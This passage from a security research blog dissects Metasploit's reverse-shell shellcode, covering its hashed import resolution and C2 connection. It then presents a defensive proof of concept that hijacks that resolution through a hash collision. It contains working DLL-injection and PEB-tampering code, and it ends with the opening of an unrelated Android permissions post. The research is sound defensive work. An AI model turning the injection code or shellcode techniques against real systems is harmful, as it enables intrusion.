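This confirms why the shellcode subtracts 8 before dereferencing the BaseDllName properties: the list pointers land on offset 0x08 of the structure, not on its start.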

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it gets modified into an uppercase. This operation is performed according to the character’s ASCII representation meaning that if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.
Figure 6: Schema depicting the hashing loops of KERNEL32.DLL‘s first character (K).

With the repeated combination of rotations and additions on a fixed register size (32 bits in edi‘s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produce a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName‘s buffer is not required to be NULL-terminated per Microsoft documentation, extensive testing has shown that NULL-termination was always the case and can generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed
        if b >= ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')
print(value)

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY‘s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follows, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.


Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with the sole difference that character cases are preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.
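Putting both routines together, the sought hash can be reproduced with a few lines of Python (reusing the hashing logic described earlier):

```python
# Helper: rotate a 32-bit value right
def ror(value, bits):
    return ((value >> bits) | (value << (32 - bits))) & 0xffffffff

# Metasploit's hashing: rotate right by 13 bits, then add, for every byte
def get_hash(data):
    result = 0
    for b in data:
        result = (ror(result, 0x0D) + b) & 0xffffffff
    return result

# DllHash: NULL-terminated Unicode module name (uppercased by the shellcode)
dll_hash = get_hash('KERNEL32.DLL\0'.encode('UTF-16-LE'))
# ExportHash: NULL-terminated ASCII export name (case preserved)
export_hash = get_hash(b'LoadLibraryA\0')
# The sought import hash is the 32-bit sum of both
print(hex((dll_hash + export_hash) & 0xffffffff))  # 0x726774c
```

The resulting value matches the hash we observed in figure 2, confirming the addition of module and export hashes.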

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The above walked double-linked list can be schematized as the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔), followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.
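The nested lookup can be sketched in Python over a mocked module list (the module and export sets below are illustrative; the real shellcode walks the PEB structures instead):

```python
# Helper: rotate a 32-bit value right
def ror(value, bits):
    return ((value >> bits) | (value << (32 - bits))) & 0xffffffff

# Metasploit's hashing: rotate right by 13 bits, then add, for every byte
def get_hash(data):
    result = 0
    for b in data:
        result = (ror(result, 0x0D) + b) & 0xffffffff
    return result

def resolve(sought_hash, modules):
    # Outer loop: walk the modules in memory order
    for module_name, exports in modules.items():
        # DllHash over the uppercase, NULL-terminated Unicode name
        dll_hash = get_hash((module_name.upper() + '\0').encode('UTF-16-LE'))
        # Inner loop: walk the exports, case preserved
        for export in exports:
            export_hash = get_hash(export.encode('ascii') + b'\x00')
            if (dll_hash + export_hash) & 0xffffffff == sought_hash:
                return module_name, export
    # No match: the real shellcode would keep walking the double-linked
    # list and eventually run past its end
    return None

# Mocked, illustrative module list
modules = {'ntdll.dll': ['NtClose'], 'kernel32.dll': ['LoadLibraryA', 'ExitProcess']}
print(resolve(0x0726774C, modules))  # ('kernel32.dll', 'LoadLibraryA')
```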

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.


The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) & mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header
print('"Dll","Export","Hash (IDA)","Hash (Yara)"')

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
        try:
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & 0xffffffff
                        # Compute additional representations
                        ida_view = metasploit_hash.to_bytes(size // 8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size // 8, byteorder='little').hex(' ')
                        # Print CSV entry
                        print(f'"{file}","{name}","{ida_view}","{{{yara_view}}}"')
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)

As an example, the following PowerShell commands generate a rainbow table and then search it for the 726774Ch hash we first observed in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.

Execution Flow Analysis

With the import resolving sorted-out, understanding the remaining code becomes a lot more accessible. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws2_32 library is loaded. If not yet loaded, this will map the ws2_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Socket 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).
Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the protocol (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being 192.168.1.202 in big endianness).
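As a quick triage helper, the pushed sockaddr_in values can be decoded with Python’s struct and socket modules (the byte string below is the in-memory layout of the constants listed above):

```python
import socket
import struct

# In-memory byte layout of the values pushed by the shellcode:
# 02 00 = AF_INET, 11 5c = port (network order), c0 a8 01 ca = IPv4 (network order)
raw = bytes.fromhex('0200115cc0a801ca')
family = struct.unpack('<H', raw[0:2])[0]   # little-endian WORD
port = struct.unpack('>H', raw[2:4])[0]     # big-endian (network order) WORD
ip = socket.inet_ntoa(raw[4:8])             # network-order IPv4 address
print(family == socket.AF_INET, port, ip)   # True 4444 192.168.1.202
```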

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.
Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will firstly focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.


From the shellcode’s perspective only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel where some security solutions can detect/impair either the communications protocol or the surrounding API calls. This attack surface however has the massive caveat that security solutions have to make the distinction between legitimate and malicious behaviors, possibly resulting in some medium/low-confidence detection.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.


If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.


While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, nor is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING‘s buffer (Buffer and MaximumLength) should therefore not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).
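To illustrate the effect with the hashing logic described earlier: growing the hashed range by even a single extra NULL character already yields a different hash (a minimal sketch; the PoC later performs the equivalent in-process by bumping MaximumLength):

```python
# Helper: rotate a 32-bit value right
def ror(value, bits):
    return ((value >> bits) | (value << (32 - bits))) & 0xffffffff

# Metasploit's hashing: rotate right by 13 bits, then add, for every byte
def get_hash(data):
    result = 0
    for b in data:
        result = (ror(result, 0x0D) + b) & 0xffffffff
    return result

# Hash over the original buffer (MaximumLength covers "KERNEL32.DLL\0")
original = get_hash('KERNEL32.DLL\0'.encode('UTF-16-LE'))
# Hash over a grown buffer: one extra NULL character now falls within
# MaximumLength and gets pulled into the hash
resized = get_hash('KERNEL32.DLL\0\0'.encode('UTF-16-LE'))
print(original != resized)  # True
```

The extra NULL bytes do not change the string itself, yet they rotate the accumulated hash further, so the shellcode’s lookup no longer matches.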

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.


One observation we made earlier is how the shellcode loops modules indefinitely until a matching export is found. As we found a flaw to alter hashes, let us analyze what happens if all hashes fail to match.

While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL‘s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
            continue
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case, 32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given a 2-bit left-shift is similar to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times the same value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
hex(get_hash('KERNEL32.DLL\0'.encode('UTF-16-LE')))
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
hex(get_hash('HERNEL32.DLX\0'.encode('UTF-16-LE')))
# "0x92af16da"
# Decrementing 'K' by 2 requires adding 8 to 'L'
hex(get_hash('IERNEL32.DLT\0'.encode('UTF-16-LE')))
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
hex(get_hash('JERNEL32.DLP\0'.encode('UTF-16-LE')))
# "0x92af16da"
# Incrementing 'K' by 1 requires subtracting 4 from 'L'
hex(get_hash('LERNEL32.DLH\0'.encode('UTF-16-LE')))
# "0x92af16da"
# Incrementing 'K' by 2 requires subtracting 8 from 'L'
hex(get_hash('MERNEL32.DLD\0'.encode('UTF-16-LE')))
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will run our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

void CALLBACK Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == NULL)
        MessageBoxError("Unable to get module file name.");
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
        MessageBoxError("Unable to get a handle to Kernel32.");
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
        MessageBoxError("Unable to get LoadLibraryA address.");

    // Open the process
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)
            MessageBoxError(message);
        return;
    }

    // Allocate memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
    {
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
        {
            CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, NULL, NULL);
            VirtualFreeEx(hProcess, lpInject, NULL, MEM_RELEASE);
        }
    }
    else
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size + 1) > 0)
            MessageBoxError(message);
    }
}
As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

BOOL APIENTRY DllMain(HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        break;
    }
    return TRUE;
}

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

void Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
    PLIST_ENTRY pEntry = NULL;
    USHORT MaximumLength = NULL;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetPebCurrentProcess failed.");
        return;
    }

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
        // Compute the new maximum length
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer
        wchar_t* NewBuffer = new wchar_t[MaximumLength];
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;
        break;
    }
}
This logic is best triggered as soon as possible once injection occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        // Stage the CWE-1288 trigger as early as possible
        Metasplop();
        break;
    }
    return TRUE;
}

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

HMODULE LoadLibraryA(_In_ LPCSTR lpLibFileName)
{
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
        MessageBoxA(NULL, buffer, NULL, MB_OK | MB_ICONERROR);
    // Exit the process
    ExitProcess(EXIT_FAILURE);
    return NULL;
}
The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.
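Each of these variations is resolved through its own import hash. For reference, these hashes are straightforward to reproduce: the sketch below is an illustrative Python reimplementation of the well-documented ROR-13 scheme used by Metasploit's x86 block_api (it is not code from our DLL), computing the familiar kernel32.dll!LoadLibraryA constant 0x0726774C:

```python
def ror32(value, count):
    """32-bit rotate right."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def block_api_hash(module, function):
    """ROR-13 accumulate over the uppercase, null-terminated UTF-16LE
    module name and the null-terminated ASCII function name, then add
    both partial hashes together (mod 2^32)."""
    module_hash = 0
    for byte in (module.upper() + "\x00").encode("utf-16le"):
        module_hash = (ror32(module_hash, 13) + byte) & 0xFFFFFFFF
    function_hash = 0
    for byte in (function + "\x00").encode("ascii"):
        function_hash = (ror32(function_hash, 13) + byte) & 0xFFFFFFFF
    return (module_hash + function_hash) & 0xFFFFFFFF

print(hex(block_api_hash("kernel32.dll", "LoadLibraryA")))  # 0x726774c
```

Precomputing such constants for every LoadLibrary variation tells us exactly which hashes a shellcode-based import resolution will push.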

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (shown on the left in figure 24). This shellcode loader prints its process ID (which we’ll target for injection) and then waits for the path of the shellcode it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780
Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see how in figure 26 our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.


As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.


This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.

How malicious applications abuse Android permissions

1 September 2021 at 15:07


Many Android applications on the Google Play Store request a plethora of permissions from the user. In most cases, those permissions are actually required for the application to work properly, even if it is not always clear why, while other times they are plainly unnecessary or are used for malicious purposes.

In a world where the user’s privacy is becoming one of the primary concerns on the internet, it is important for the users to understand the permissions each application is requesting and to determine whether or not the application really needs it.

In this blog post, we will go over what exactly these permissions are, and we will illustrate legitimate permission usages as well as several illegitimate permission usages. We hope that this blog post will help the reader understand that blindly granting permissions to an application can have a severe impact on their privacy or even wallet.

What are application permissions

If developers want their application to perform a sensitive action, such as accessing private user data, they have to request a specific permission from the Android system. The system then either grants the permission automatically (if it was already granted before) or shows the user a dialog asking them to grant it. Each granted permission allows the application to perform a specific action. For example, the permission android.permission.READ_EXTERNAL_STORAGE grants read access to the shared storage space of the device.

By default, Android applications do not have any permissions that allow them to perform sensitive actions that would have an impact on the user, the system or other applications. This includes accessing the local storage outside of the application container, accessing the user’s messages or accessing sensitive device information.

The Android operating system differentiates three types of permissions: normal permissions, signature permissions and dangerous permissions.

Normal permissions grant access to data and resources outside of the application sandbox which pose very little risk of compromising user data or other applications on the system. Normal permissions declared in the application’s manifest are automatically granted upon installing the application on the device. Users do not need to grant these permissions and cannot revoke them. The android.permission.INTERNET permission, allowing the application to access the internet, is an example of a normal permission.

Signature permissions grant access to custom permissions declared by an application signed with the same certificate as the requesting application. These permissions are granted automatically by the system upon installation. Users do not need to grant those permissions and cannot revoke them.

